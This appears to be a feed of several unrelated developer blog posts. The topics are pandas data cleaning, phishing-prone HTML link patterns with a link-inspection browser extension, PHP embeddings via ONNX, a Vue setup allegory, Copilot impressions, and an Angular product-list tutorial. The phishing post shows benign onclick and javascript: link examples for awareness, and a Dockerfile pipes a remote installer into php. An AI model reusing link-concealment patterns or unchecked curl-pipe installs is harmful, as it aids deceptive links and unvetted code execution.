15 Sirius Black Male 16 England Transfiguration Gryffindor Pure-blood Owl Chestnut Dog Beater Full Moon Defense Against the Dark Arts 140.0 16 Horace Slughorn Male 16 England Potions Slytherin Half-blood NaN Cedar Non-corporeal NaN Failure Potions 100.0 17 Filius Flitwick Male 17 England Charms Ravenclaw Half-blood NaN Hornbeam Non-corporeal NaN Failure Charms 180.0 18 Pomona Sprout Female 16 England Herbology Hufflepuff Pure-blood Cat Pine Non-corporeal NaN Failure Herbology 170.0 19 Helena Ravenclaw Female 17 Scotland Charms Ravenclaw Pure-blood NaN Rowan Non-corporeal NaN Her mother Charms 160.0 20 Godric Gryffindor Male 17 England Dueling Gryffindor Pure-blood NaN Sword Lion NaN Failure Dueling 200.0 21 Helga Hufflepuff Female 17 Wales Herbology Hufflepuff Pure-blood NaN Cedar Non-corporeal NaN Failure Herbology 190.0 22 Rowena Ravenclaw Female 17 Scotland Charms Ravenclaw Pure-blood NaN Maple Eagle NaN Failure Charms 180.0 23 Salazar Slytherin Male 17 England Dark Arts Slytherin Pure-blood NaN Ebony Serpent NaN Failure Dark Arts 200.0 24 Molly Weasley Female 16 England Household Charms Gryffindor Pure-blood Owl Pine Non-corporeal NaN Failure Household Charms 80.0 25 Arthur Weasley Male 16 England Muggle Artifacts Gryffindor Pure-blood NaN Hornbeam Non-corporeal NaN Failure Muggle Studies 60.0 26 Lucius Malfoy Male 16 England Dark Arts Slytherin Pure-blood Owl Elm Non-corporeal NaN Failure Dark Arts 90.0 27 
Narcissa Malfoy Female 15 England Potions Slytherin Pure-blood NaN Hawthorn Non-corporeal NaN Failure Potions 70.0
28 Pansy Parkinson Female 11 England Gossip Slytherin Pure-blood Cat Birch Non-corporeal NaN Failure Gossip 40.0
29 Vincent Crabbe Male 11 England Strength Slytherin Pure-blood NaN Oak Non-corporeal NaN Failure Strength 50.0
30 Gregory Goyle Male 11 England Strength Slytherin Pure-blood NaN Alder Non-corporeal NaN Failure Strength 50.0
31 Lily Evans Female 11 England Charms Gryffindor Muggle-born NaN Willow Doe NaN Failure Charms 150.0
32 James Potter Male 11 England Dueling Gryffindor Pure-blood Owl Walnut Stag Chaser Failure Dueling 160.0
33 Peter Pettigrew Male 11 England Transformation Gryffindor Half-blood Rat Ash Non-corporeal NaN Failure Transformation 30.0
34 Gilderoy Lockhart Male 15 England Memory Charms Ravenclaw Half-blood NaN Cherry Non-corporeal NaN Failure Memory Charms 70.0
35 Dolores Umbridge Female 15 England Dark Arts Slytherin Half-blood Cat Hemlock Non-corporeal NaN Failure Dark Arts 60.0
36 Newt Scamander Male 17 England Magical Creatures Hufflepuff Half-blood Demiguise Chestnut Non-corporeal NaN Failure Creatures 160.0
37 Tina Goldstein Female 17 USA Auror Hufflepuff Half-blood Owl Ash Non-corporeal NaN Failure Defense Against the Dark Arts 140.0
38 Queenie Goldstein Female 17 USA Legilimency Ravenclaw Half-blood Owl Cypress Non-corporeal NaN Failure Legilimency 130.0
39 Jacob Kowalski Male 17 USA Baking Hufflepuff No-mag NaN Birch Non-corporeal NaN Failure Baking 10.0
40 Theseus Scamander Male 17 England Auror Gryffindor Half-blood Dog Elder Non-corporeal NaN Failure Defense Against the Dark Arts 150.0
41 Leta Lestrange Female 16 England Potions Slytherin Pure-blood Cat Ebony Non-corporeal NaN Failure Potions 100.0
42 Nagini Female 18 Indonesia Transformation Slytherin Half-blood Snake Teak Non-corporeal NaN Failure Transformation 90.0
43 Grindelwald Male 18 Europe Dark Arts Slytherin Pure-blood NaN Elder Non-corporeal NaN Failure Dark Arts 200.0
44 Bathilda Bagshot Female 17 England History of Magic Ravenclaw Half-blood Cat Willow Non-corporeal NaN Failure NaN NaN
45 Aberforth Dumbledore Male 17 England Goat Charming Gryffindor Half-blood Goat Oak Non-corporeal NaN Failure Goat Charming 70.0
46 Ariana Dumbledore Female 14 England Obscurus Gryffindor Half-blood NaN Fir Non-corporeal NaN Failure Obscurus 20.0
47 Victor Krum Male 17 Bulgaria Quidditch Durmstrang Pure-blood NaN Hawthorn Non-corporeal Seeker Failure Quidditch 180.0
48 Fleur Delacour Female 17 France Charms Beauxbatons Half-blood NaN Rosewood Non-corporeal NaN Failure Charms 140.0
49 Gabrielle Delacour Female 14 France Charms Beauxbatons Half-blood NaN Alder Non-corporeal NaN Failure Charms 80.0
50 Olympe Maxime Female 17 France Strength Beauxbatons Half-blood NaN Fir Non-corporeal NaN Failure Strength 110.0
51 Igor Karkaroff Male 18 Europe Dark Arts Durmstrang Half-blood NaN Yew Non-corporeal NaN Failure Dark Arts 90.0
```

Once we've corrected the data types in the dataset, it's time to save it, so that it's ready for our next set of adventures.

```
# Save the cleaned dataset; index=False keeps the row index out of the file
hogwarts_df.to_csv('data/hogwarts-students-01.csv', index=False)
```

### **4A.9 Gemika's Pop-Up Quiz: Unveiling the Mysteries**

And now, young wizards and witches, my son Gemika Haziq Nugroho appears with a sparkle in his eye and a quiz at the ready. Are you prepared to test your newfound knowledge and prove your prowess in data exploration?

1. **What function do we use to display the first few rows of a DataFrame**?
2. **Why is it important to check the data types of each column in our dataset**?
3. **How can we convert a column to a numeric type if it's not already**?

Answer these questions with confidence, and you will demonstrate your mastery of the initial steps in data exploration. With our dataset now fully understood and prepared, we are ready to dive even deeper into its mysteries. Onward, to greater discoveries! 🌟✨🧙‍♂️

By now, you should feel like a true data wizard, ready to uncover the hidden patterns and secrets within any dataset. Let us continue our journey with confidence and curiosity, for there is much more to discover in the magical world of data science! 🌌🔍
gerryleonugroho
1,916,595
Stop Phishing by Analyzing the Bait
Phishing is a cybersecurity threat that relies on human error or trust. It's a social engineering attack intent on obtaining information by getting a user to open an email or click on a link. Can I build a tool that could help users to know something about a link before they click on it?
0
2024-07-12T21:10:44
https://dev.to/rebeccapeltz/stop-phishing-by-analyzing-the-bait-3f0f
cybersecurity, phishing, browserextension
---
title: Stop Phishing by Analyzing the Bait
published: true
description: Phishing is a cybersecurity threat that relies on human error or trust. It's a social engineering attack intent on obtaining information by getting a user to open an email or click on a link. Can I build a tool that could help users to know something about a link before they click on it?
tags: cybersecurity, phishing, browserextension
cover_image: https://res.cloudinary.com/picturecloud7/image/upload/c_pad,h_420,w_1000,b_auto/no-fishing-allowed_w1ikle.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2024-07-08 23:32 +0000
---

CyberSecurityNews.com published a gif on X last spring, [Top 8 Cyber Attacks 2024](https://x.com/The_Cyber_News/status/1769244926984765858), showing the top 8 cybersecurity threats for 2024. This chart has popped up in many places. I like the way it's paired with Beethoven's Moonlight Sonata here:

{% embed https://youtu.be/aVPfexDpikM?si=ilOytMBbtNXxKWhg %}

If you look closely at the list, 3 out of 8 of these attacks rely on front-end software, that is, a vulnerability in the browser. Fullstack application developers can use this awareness to help prevent these problems. The list of attacks is shown below. Attacks 1, 5, and 6 occur in the browser.

1. Phishing
2. Ransomware
3. Denial of Service (DoS)
4. Man-in-the-middle (MiTM)
5. SQL Injection
6. Cross Site Scripting (XSS)
7. Zero-Day Exploits
8. DNS Spoofing

Both Phishing and Cross Site Scripting rely on links that a user clicks on to carry out the attack. In the case of Phishing, the link is often in an email. Both are forms of Social Engineering that rely on the user's trust and possibly lack of knowledge. I'm going to focus on Phishing in this post because it is one of the most prevalent types of attack.

Companies are aware of the losses that result from cyber crimes, and instruct employees in what to look for to prevent attacks that involve links. However, the nature and attributes of the HTML anchor element that is used to create links might make it difficult for users to spot a problem with the link. I've worked on product releases where the goal was to rework any HTML that could create a vulnerability. But in the end, if you tell a user to 'hover over each link in the email and make sure that the underlying URL looks OK', you're asking a lot.

Let's look at the anchor tag attribute variations that might make it difficult for a user to just hover over the link to determine if the link is OK.

**1. Expected Anchor Element.**

The HTML anchor tag was created to make navigation between web pages easier. A basic anchor element includes a URL assigned to an href attribute and text content that describes where the URL will navigate to.

```html
<a href="https://www.example.com" target="_blank">Example</a>
```

The design of the anchor element strongly suggests that the user shouldn't have to know what the URL is. If the URL needed to be known, it could be copied into the text content. If all the URLs were spelled out, it would make for an unattractive and probably messy looking web page. This variation is the most commonly used. If the user hovers over `Example`, they will see `https://www.example.com`.
**2. Using `onclick` in an Anchor Element.**

We can introduce more complex instructions into the anchor tag by adding an `onclick` event handler and JavaScript. Here are three examples of what we can do when we want to run some JavaScript when the link is clicked. In all cases, hovering over the link won't show you the `onclick` event.

**a. `onclick` returns false.**

When the JavaScript in the onclick handler returns false, the navigation to the URL in href is not executed. But if the JavaScript itself is the problem, it's too late once you've clicked: hovering over the link showed a URL that looked OK.

```html
<a href="https://www.example.com" target="_blank" onclick="alert('hello'); return false;">Say Hello</a>
```

**b. `onclick` doesn't return false.**

If the `onclick` handler JavaScript code doesn't return false, then the link will navigate as intended. Hovering over the link will show an OK URL, and the code will navigate to that URL. In this case, all will seem well, but if the JavaScript contained a problem, it's too late to fix it.

```html
<a href="https://www.example.com" onClick="alert('found me')" target="_blank">onClick me</a>
```

**c. Anchor tag doesn't contain an href attribute.**

If the `href` is not included, the anchor element will render without text decoration, but it will still be clickable if an `onclick` is included. For users accustomed to clickable items showing some sign of click-ability, like text decoration or CSS that styles clickable text to look like a button, there may be some confusion here. A user instructed to hover over links would likely ignore clicking on this entirely.

```html
<a onClick="alert('found me')" target="_blank">onclick me</a>
```

**3. No encryption in URL.**

If the URL references a site that doesn't use encryption, like `http://www.example.com` vs. `https://www.example.com`, this could raise a question. These days, browsers will often upgrade the connection to HTTPS even if the scheme is `http`. There are extensions and settings to make browsers encrypt automatically, but if the user hovers and finds that HTTP instead of HTTPS is used, this could be the sign of a problem.

```html
<a href="http://info.cern.ch/" target="_blank" onclick="alert('my href is unencrypted but chrome will make it secure'); return true;">info.cern.ch is unencrypted</a>
```

**4. `href` refers to a URI with a `javascript:` pseudo scheme.**

Although it's most common to see a scheme in a URI like `https:`, other schemes are in use. For example, `mailto:` and `tel:` are used to send messages via email and SMS. These schemes are followed by email addresses and telephone numbers, and the results are referred to as URIs instead of URLs: the scheme is followed by an **identifier** instead of a **location**. Both `mailto:` and `tel:` are visible when hovering on a link.

It's also possible to use `javascript:` as a scheme. It is then followed by a call to a function in the context of the HTML. In the example below, it is calling the function `doSomething`. This will be visible upon hovering, but because the contents of the JavaScript code are not known, it may raise a question.

```html
<a href="javascript:doSomething()">Javascript me</a>
```

I hope the examples above show how difficult it could be for a user to determine if a link in their email should be clicked on or reported as a possible threat. What's the solution?

## Create a Browser Extension

What is needed is a full analysis and report on what is going on within the links on a webpage.
There needs to be a way to quickly generate some information that shows the links without hovering and provides alerts as to which links may have some unexpected attribute settings. We need a Phish Bait analyzer report. It would be nice if browsers had this feature, but until they do, we can create a Chrome extension to do it (a minimal sketch of the core idea appears at the end of this post).

I created an extension named [Link Reveal](https://chromewebstore.google.com/detail/link-reveal/fmmmcdmfaadidngnfnidhlmpgigmnhjh) and published it in the Chrome Web Store. I'm not the only one who thought of this. If you search the Store for terms like "link" or "phish", you'll find many extensions that relate to the anchor tag. If you're interested, you can also look at the [code](https://github.com/rebeccapeltz/link-reveal-ext).

There are a couple of test pages you can use:

[Page with a lot of different anchor tags](https://www.beckypeltz.me/link-reveal-ext/).

[Page with no anchor tags](https://www.beckypeltz.me/link-reveal-ext/nolinks.html).

## Other Solutions for Preventing Phishing

The Chrome extension is useful for getting a better look at the attributes of rendered anchor elements. In some cases, though, once an email web page is opened, the malware has already been installed. There are tools to investigate emails before they are opened, so that any links containing suspicious URLs or URIs can be removed before the user can access them. This [blog](https://www.leadfeeder.com/blog/best-email-tracking-tools/) summarizes some of those tools and how they work.

## Learn More About Cybersecurity

The chart below shows that phishing is on the rise.

![Phishing attacks](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pzevx1bofghytcm6olnv.png)

[credit: phishing-statistics](https://www.thesslstore.com/blog/phishing-statistics/)

Cybersecurity awareness is important for developers. I joined [ISC2](https://www.isc2.org/) and learned a lot.

See this [guide](https://rpeltz.gitbook.io/create-and-publish-a-chrome-browser-extension) for creating and publishing the browser extension described in this post.
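As promised, here is a minimal sketch of the kind of scan a content script could run. This is illustrative only, not the actual Link Reveal source; the checks are simplified versions of the warning signs discussed above:

```javascript
// Minimal content-script sketch: collect basic facts about every anchor on the page
function analyzeLinks() {
  return Array.from(document.querySelectorAll('a')).map((anchor) => {
    const href = anchor.getAttribute('href') || '';
    return {
      text: anchor.textContent.trim(),
      href,
      hasOnClick: anchor.hasAttribute('onclick'),  // inline handlers are invisible on hover
      missingHref: !anchor.hasAttribute('href'),   // clickable only through JavaScript
      javascriptScheme: href.trim().toLowerCase().startsWith('javascript:'),
      unencrypted: href.startsWith('http://'),     // plain HTTP is worth a second look
    };
  });
}

console.table(analyzeLinks());
```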
rebeccapeltz
1,916,613
Generating embeddings with PHP and ONNX
IA e PHP No campo da inteligência artificial (IA) e processamento de linguagem natural...
0
2024-07-15T21:13:56
https://dev.to/jonas-elias/gerando-embeddings-com-php-e-onnx-44gk
# AI and PHP

In the field of artificial intelligence (AI) and natural language processing (NLP), _embeddings_ are mathematical representations of words, sentences, or documents that capture their semantic meaning. These _embeddings_ are used in applications that include semantic search, sentiment analysis, and more. Creating _embeddings_ usually involves machine learning techniques that are traditionally implemented in languages such as Python. However, with the growing popularity of the [Open Neural Network Exchange](https://github.com/onnx/onnx) (ONNX) architecture, it is possible to integrate pre-trained models into different programming languages, including PHP.

# Transformers PHP

To use artificial intelligence models for generating _embeddings_ in PHP, you can use the [TransformersPHP](https://github.com/CodeWithKyrian/transformers-php) library, which was designed to be functionally equivalent to the [Transformers](https://pypi.org/project/transformers/) library in Python, maintaining the same level of performance and ease of use. TransformersPHP uses the ONNX Runtime to execute the pre-trained models.

# Example Architecture

Below, you can see a visual overview of how embedding generation works with the TransformersPHP library:

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q0cwdz4iv9mhsj62k2jc.png)

# Usage

First, configure the image that the container will use. To use TransformersPHP with support for generating _embeddings_, the `FFI` and `Imagick` extensions are required. The `FFI` extension is the integration interface between binary code and the PHP language, while `Imagick` is used for processing the pre-trained models.

```docker
FROM php:8.3

RUN apt-get update && apt-get install -y libffi-dev \
    git \
    unzip \
    libmagickwand-dev \
    libmagickcore-dev

RUN docker-php-ext-configure ffi --with-ffi \
    && docker-php-ext-install ffi

RUN pecl install imagick \
    && docker-php-ext-enable imagick

RUN curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer

RUN mkdir /embeddings

WORKDIR /embeddings

CMD ["/bin/bash"]
```

After that, you can build the image:

```
docker build -t image-php-ffi .
```

Followed by running the container:

```
docker run -it --rm --name container-php-ffi image-php-ffi
```

Inside the container, you first need to add the `codewithkyrian/transformers` dependency, so run:

```
composer require codewithkyrian/transformers
```

With that, the environment is configured and ready for the code that will generate the embedding. Below, you can see that the PHP code references the `Xenova/bert-base-uncased` model, made available by the [Xenova](https://huggingface.co/Xenova) initiative, which offers pre-trained models based on the ONNX architecture.
```php
<?php

declare(strict_types=1);

require_once './vendor/autoload.php';

use Codewithkyrian\Transformers\Transformers;
use function Codewithkyrian\Transformers\Pipelines\pipeline;
use function Codewithkyrian\Transformers\Utils\{memoryUsage, timeUsage};

Transformers::setup()
    ->apply();

$extractor = pipeline('feature-extraction', 'Xenova/bert-base-uncased');

$embeddings = $extractor('The quick brown fox jumps over the lazy dog.', normalize: true, pooling: 'mean');

var_dump($embeddings[0]);

dd(memoryUsage(), timeUsage(milliseconds: true), count($embeddings[0]));
```

Create a new PHP file, copy the code above into it, and then run it with `php file_name.php`. The first execution may take longer because the pre-trained model has to be downloaded.

# Semantic Search

Generating _embeddings_ can be valuable for building search systems that work at the semantic level, a topic I cover in more detail in the talk [Palestra APIs e LLMs](https://www.youtube.com/watch?v=fpQDvcj5Fb4).

# Drawbacks

Using PHP and the ONNX architecture to generate _embeddings_ can have some drawbacks. Most _transformer_ models are developed on the `PyTorch` architecture, which is tightly integrated with the Python language, limiting testing and development in other languages. Converting `PyTorch` models to ONNX can be complex or even unfeasible, depending on the support and updates provided by the model maintainers.

# Conclusion

Integrating AI and NLP with PHP using the ONNX architecture is a promising approach that allows pre-trained models to be used in a programming language widely adopted in web development. The TransformersPHP library proves to be functionally equivalent to its Python counterpart, allowing embeddings to be generated easily and efficiently. Although there are challenges, such as the complexity of model conversion and the need for specific extensions, using PHP to generate embeddings can open new opportunities for web developers who want to incorporate NLP capabilities into their applications without migrating to other languages. With the continuous evolution of these technologies and growing community support, the current barriers are expected to be progressively reduced, making this approach increasingly accessible and effective for a wide range of developers and applications.

## References

- [ONNX](https://github.com/onnx/onnx)
- [Transformers PHP](https://github.com/CodeWithKyrian/transformers-php)
- [Transformers PHP - DOC](https://codewithkyrian.github.io/transformers-php/)
- [Transformers](https://pypi.org/project/transformers/)
- [Transformers Hugging Face](https://huggingface.co/docs/transformers/index)
- [Docker PHP](https://hub.docker.com/_/php)
- [Xenova](https://huggingface.co/Xenova)
jonas-elias
1,916,645
God's Vue: An immersive tale (Chapter 2)
Chapter 2: Let There Be Light The Birth of An Instance After laying down the foundation of Eden,...
0
2024-07-14T16:56:31
https://dev.to/zain725342/gods-vue-an-immersive-tale-chapter-2-2ppp
vue, webdev, javascript, learning
**Chapter 2: Let There Be Light**

**The Birth of An Instance**

After laying down the foundation of Eden, the next step in the developer's journey was to bring light and structure to this nascent world. With a clear vision in his mind, he placed his fingers on the cosmic keyboard and conjured the `createApp` function—an entity of mystical origin, responsible for the initiation of every Vue application in existence. To perform this task, the `createApp` function demanded the root component as an object, and in return, it created an application instance. This instance, now imbued with the essence of the developer's vision, was destined to play a crucial role in the development ahead.

**Root and The Tree of Life**

To fully understand the gravity of the transaction that took place between the `createApp` function and the developer, we must grasp the significance of the root component and its role. The root component serves as the origin from which every other child component blooms, regardless of size, to play its part in developing the new world. It encapsulates the structure and behavior of the entire creation process. The developer was fully aware of the importance of this transaction and its outcome. It was the only way to give birth to a new instance and proceed with his plans. According to some divine sources, the following commandments were authored by the developer to perform the holy transaction:

```
import { createApp } from 'vue'
import App from './App.vue'

const app = createApp(App)
```

After the transaction, an instance was born, allowing the Vue application to be organized into a tree of nested and reusable components, initially branching from the root itself. This hierarchical structure allowed for a modular and scalable approach to the creation of the intended world, with each component serving a specific purpose and contributing to the overall harmony and functionality of the creation.

**Divine Configurations**

With the application instance in hand, the developer knew the greatness he could achieve and the glory that awaited Eden. This new world would soon be unleashed in its full splendor. The application instance was more than just a beginning; it was a divine tool imbued with the power to shape the very fabric of Eden. Among its many powers, the `.config` object stood out, allowing the developer to configure app-level options with precision and care. The `.config` object was akin to a celestial scepter, giving the developer control over vital aspects of the application's behavior. One such control was error handling, a safeguard to capture and manage errors from all descendant components:

```
app.config.errorHandler = (err, vm, info) => {
  // Handle the error gracefully
  console.error('Error captured: ', err)
}
```

It was crucial for the developer to apply these divine configurations before mounting the application, to define its behavior and environment. These configurations ensured that the application operated according to the developer's divine intent, setting the stage for a harmonious and well-ordered process.

**App-Scoped Assets**

As the developer continued to wield the power of the application instance, he discovered even more remarkable capabilities that lay within his grasp. Among these were the methods for registering app-scoped assets. These assets, such as components, were essential elements that would be accessible throughout the entire realm of Eden, ensuring that the creation was both cohesive and versatile.
```
app.component('MyComponent', {
  template: '<div>A holy component</div>'
})
```

The application instance was not merely a static foundation; it was a living, breathing entity capable of growth and adaptation. By registering app-scoped assets, the developer could ensure that Eden could reuse and access key elements from anywhere within its vast realm.

**Mounting the Creation**

After fully exploring the vast potential of the application instance, the time had come for the developer to finally bring light to his nascent world and begin its true development. However, despite all the power at hand, the application instance refused to render anything unless the `.mount()` method was called. This method should be invoked after all app configurations and asset registrations. The return value of the `.mount()` method was the root component instance, unlike the asset registration methods, which returned the application instance. The `.mount()` method also expected a container argument, symbolized by the ID `#app`. The container was a special vessel, an empty shell awaiting the essence of creation. Hence, the developer provided it with `#app` and invoked the sacred method:

```
app.mount('#app')
```

Suddenly, a burst of light exploded throughout Eden, and it finally started to breathe. The content of the app's root component was rendered inside this container element, which acted as a frame through which the masterpiece of Eden was revealed, showcasing the intricate structure and boundless possibilities of the developer's creation. This act of mounting anchored the new world into the fabric of reality, setting the stage for the developer to begin what he was truly known for: the development of a great world.
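For mortals who wish to retrace the whole rite in one place, here is a minimal sketch assembling the steps from this chapter. The `MyComponent` registration and the error handler are the illustrative examples from above, not canonical scripture:

```
import { createApp } from 'vue'
import App from './App.vue'

// Forge the application instance from the root component
const app = createApp(App)

// Divine configuration: capture errors from all descendant components
app.config.errorHandler = (err) => {
  console.error('Error captured: ', err)
}

// An app-scoped asset, reachable from anywhere in the realm
app.component('MyComponent', {
  template: '<div>A holy component</div>'
})

// Anchor the creation into reality -- configurations first, mounting last
app.mount('#app')
```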
zain725342
1,917,097
GitHub Copilot has its quirks
I've been using GitHub Copilot with our production codebase for the last 4 months, and here are some...
0
2024-07-15T14:23:37
https://dev.to/gauraws/github-copilot-has-its-quirks-34o1
ai, github, javascript, productivity
I've been using **[GitHub Copilot](https://github.com/features/copilot)** with our production codebase for the last 4 months, and here are some of my thoughts: **The Good:** 1. **Explains Complex Code**: It’s been great at breaking down tricky code snippets or business logic and explaining them properly. 2. **Unit Tests**: Really good at writing unit tests and quickly generating multiple scenario-based test cases. 3. **Code Snippets**: It can easily generate useful code snippets for general-purpose use cases. 4. **Error Fixes**: Copilot is good at explaining errors in code and providing suggestions to fix them. **The Not-So-Good:** 1. **Context Understanding**: It’s hard to explain the context to a GenAI tool, especially when our code is spread across multiple files/repos. It struggles to understand larger projects where changes are required in multiple files. 2. **Inaccurate Suggestions**: Sometimes it suggests installing npm libraries or using methods from npm packages that don’t exist. This is called [Hallucination](https://en.wikipedia.org/wiki/Hallucination_(artificial_intelligence)), where AI-generated code looks convincing but is completely wrong. 3. **Complex Code**: Occasionally, the code it generates is confusing and complex, making debugging harder. In those moments, I wish I had written the logic myself and let Copilot check for errors or bugs. Overall, GitHub Copilot has been a useful tool, but it has its quirks. When using large language models, the responsibility always stays with the programmer.
gauraws
1,917,213
From Requirements to Code: Implementing the Angular E-commerce Product Listing Page
Introduction Welcome back to my series on building a scalable Angular e-commerce...
28,006
2024-07-14T16:25:12
https://dev.to/cezar-plescan/from-requirements-to-code-implementing-the-angular-e-commerce-product-listing-page-23nn
angular, grid, tutorial, responsivedesign
## Introduction Welcome back to my series on building a scalable Angular e-commerce application! In the [previous article](https://dev.to/cezar-plescan/building-an-angular-e-commerce-app-a-step-by-step-guide-to-understanding-and-refining-requirements-hoe), I embarked on the crucial journey of understanding and refining the requirements for our Minimum Viable Product (MVP). Through collaborative discussions with stakeholders and careful analysis, we crafted a clear user story and acceptance criteria for the first feature: displaying a list of products. ### Overview In this article, I'll take the next crucial step: translating those requirements into tangible code. I'll delve into the initial implementation of the product listing page, exploring the thought process behind key decisions and showcasing practical techniques for creating a responsive and visually appealing layout. ### What I'll cover **Component Design**: Identifying the core components needed for the product list and establishing their relationships. **Data Modeling and Mock Data**: Creating a data structure to represent our products and utilizing mock data to simulate a real-world scenario. **Angular Material Integration**: Leveraging the power of Angular Material components to create a visually appealing and user-friendly interface. **Responsive Grid Layout**: Implementing a flexible grid layout that adapts to different screen sizes, ensuring optimal display across devices. **Spacing and Layout Refinements**: Exploring different techniques for achieving the desired spacing and visual balance between product cards. By the end of this article, you'll have a solid understanding of how to transform user stories and acceptance criteria into working Angular code, setting a strong foundation for building out the rest of our e-commerce application. ### Motivation My aim is to provide a practical, step-by-step guide that goes beyond theoretical concepts. I want to share my thought process as a developer, highlighting the decisions I make and the challenges I encounter along the way. By following along, you'll gain valuable insights into how to approach frontend development in a real-world scenario. The goal of this article is not just to show you _how_ to build a product list, but _why_ certain decisions are made, cultivating a deeper understanding of the architectural considerations involved in creating a successful e-commerce application. Whether you're a beginner or an experienced Angular developer, this article will equip you with the knowledge and skills to build the foundation of a successful e-commerce application. 
### A Quick Recap of the User Story and Acceptance Criteria Let's revisit the refined user story and acceptance criteria that will guide the implementation: > _**User Story**_: > > _As a potential customer, I want to see a clear and visually appealing list of products with their images, names, and prices, so that I can quickly browse and compare items before making a purchase decision._ > > _**Acceptance Criteria**:_ > - _Layout_: > - _The product listing page displays products in a grid layout._ > - _Each row of the grid contains a maximum of 4 product items._ > - _The layout is responsive and adapts to different screen sizes._ > - _Product Card Content:_ > - _Each product card displays a clear product image._ > - _The product name is prominently displayed below the image._ > - _The price is displayed clearly, using the appropriate currency symbol._ > - _Functionality:_ > - _The product list is initially loaded when the user navigates to the product listing page._ > - _MVP Considerations:_ > - _The product list does not include pagination or infinite scrolling in this initial version._ > - _Error handling for data fetching issues will be addressed in a later iteration._ > - _Technical Notes:_ > - _Data Source: Product data will be initially hardcoded on the frontend._ > - _UI Framework: The Angular Material library will be used for styling and components._ ### An overview of the path from requirements to code Now, it's time to translate these requirements into actual code. While there's no one-size-fits-all process, I'll share the high-level approach I typically take: 1. **Project setup**: Create the Angular project and any essential initial configurations. 2. **Component identification and hierarchy**: Identify the visual components needed for the product listing page and define their hierarchical relationships. This involves deciding which components will contain other components and how they will interact. 3. **Data retrieval**: Determine the data source and how to fetch and manage the product data within the application. 4. **Layout and styling**: Create the visual layout of the product list and style the individual product cards to meet the design requirements. I'll discuss this in more detail later. While these steps provide a solid starting point, it's important to remember that the development process is often iterative. We might discover new requirements, encounter unexpected challenges, or need to make adjustments based on user feedback. Therefore, it's crucial to maintain flexibility in our planning and be prepared to adapt as we go. In the next section, I'll delve deeper into each step of the implementation, starting with the identification of components and their hierarchical structure. ## Identifying the component structure ### Create the Angular project Before identifying the component structure I need to create a new project with the Angular CLI command: ```bash npx --yes --package @angular/cli@18 ng new Angular-Architecture-Guide --defaults --standalone=true ``` If you don't have npx installed, you can run: ```bash npm install -g npx ``` _**Note**: You can also find the code for this project on Github at https://github.com/cezar-plescan/Angular-Architecture-Guide/. The `master` branch contains the initial project setup._ ### Creating the main components Analyzing the user story, I identify two main visual elements: - **the product list container**, a single element which holds all visible products. 
- **product elements**, each containing product details within the list container. I immediately notice that there's a parent-child component relationship between the list and each product. Here are the two components I'll create: - **`ProductListComponent`** - the container for the entire product list - **`ProductCardComponent`** - a reusable component for displaying individual product information. To create these components, I'll use the Angular CLI commands: ```bash ng generate component product-list ng generate component product-card ``` ### Building the initial component structure Now that I have a clear vision for the product listing page, I'll start sketching out the structure of the Angular components. The `ProductListComponent` will act as an orchestrator, managing the display of multiple `ProductCardComponent` instances, each representing a single product. To get a better sense of the data flow and component interaction, I'll create a basic template for the product list:{% embed https://gist.github.com/cezar-plescan/68afb65852c1876cde48155c2edead30 %} This template outlines my intent: I'll iterate over a `products` array and pass each `product` object as an input to a `ProductCardComponent`. However, there are some missing pieces: - I haven't defined the `products` array and how I'll fetch the product data. - The `ProductCardComponent` needs a `product` input property to receive the data from the parent component. - I need a `Product` interface to define the structure of each product so that both the list and the card components can work with the data consistently. To address these missing pieces, I'll start by defining the `Product` interface, as this is the foundation for working with product data in my components. Then, I'll create the input property in the `ProductCardComponent` and, finally, provide some initial product data to populate the list. ### Creating the `Product` interface Since both components will be working with product data, it makes sense to define a common structure for this data. To achieve this, I'll create an interface called `Product`: {% embed https://gist.github.com/cezar-plescan/8c6c5695db1524060095636a445bab83 %} Now, the question is: _where should I place this interface file?_ Since it's not specific to either component but will be used by both, a shared location makes the most sense. Within the `src/app` directory, I'll create a new folder named `shared`. This will serve as a central repository for code that's used multiple times across the application. Inside `shared`, I'll create another folder called `types` to specifically house our data interfaces. Therefore, the `product.interface.ts` file will reside in the `src/app/shared/types` folder. This approach promotes reusability and maintainability, as it makes the `Product` interface easily accessible from anywhere in our application. ### Add an input property to the `ProductCardComponent` Now that I have the `Product` interface, I need a way for the `ProductListComponent` to pass the data for each individual product to the `ProductCardComponent`. To achieve this, I'll add an input property to the `ProductCardComponent`. I'll call this input property `product` since it will be used to hold the data for a single product. 
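In case the embedded gist below doesn't render where you're reading this, a minimal sketch of the idea might look like the following. Treat it as an illustration: the `required` option and the exact decorator wiring are my assumptions, and the author's actual code lives in the gist:

```typescript
import { Component, Input } from '@angular/core';
import { Product } from '../shared/types/product.interface';

@Component({
  selector: 'app-product-card',
  standalone: true,
  templateUrl: './product-card.component.html',
})
export class ProductCardComponent {
  // Receives a single product's data from the parent ProductListComponent
  @Input({ required: true }) product!: Product;
}
```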
Here's the updated code for `product-card.component.ts`: {% embed https://gist.github.com/cezar-plescan/bf311a37829864791577cbab4ad96eb2 %} ### Define the product catalog data Since we don't yet have a backend API to provide product information, I'll use mock data for our initial implementation. This allows me to focus on building the frontend components and their interactions without being blocked by the backend development. To keep my code organized, I'll create a separate file to store this mock data. I'll name it `product-data.ts` and place it within the `product-list` folder. This makes sense because the mock data is directly related to this specific feature and isn't currently needed elsewhere in the application. Here is what the file will contain: {% embed https://gist.github.com/cezar-plescan/c8892090328bb7b80449ab3ed62ca48a %} Now that I have the product mock data, I can load it into the `ProductListComponent` to be displayed on the product listing page. Here's the relevant code: {% embed https://gist.github.com/cezar-plescan/3ec636de5e488dbbccac8f32a865b681 %} ### Displaying the products Now that I've defined the data models and loaded the mock product data, I'll bring the product listing page to life. #### Rendering the product list First, I need to tell the main application component `AppComponent` to display the `ProductListComponent`. This is where the product list will actually be rendered. I can do this by updating the `app.component.html` file: {% embed https://gist.github.com/cezar-plescan/8854bbbf986859739d678aad76a5f1e4 %} #### Displaying individual products Next, I need to populate the `ProductCardComponent` template to display the details of each individual product. For now, I'll keep it simple to verify that the data is loading correctly. Note that I'm using the `currency` pipe to format the price in Euros. {% embed https://gist.github.com/cezar-plescan/7a072511d2d361e7d28333e8d9c5d9b6 %} #### Using `mat-card` from Angular Material for styling As mentioned in the acceptance criteria, I'll be using Angular Material to style the product cards. I'll install the package using the Angular CLI. This command will prompt you to choose a pre-built theme and set 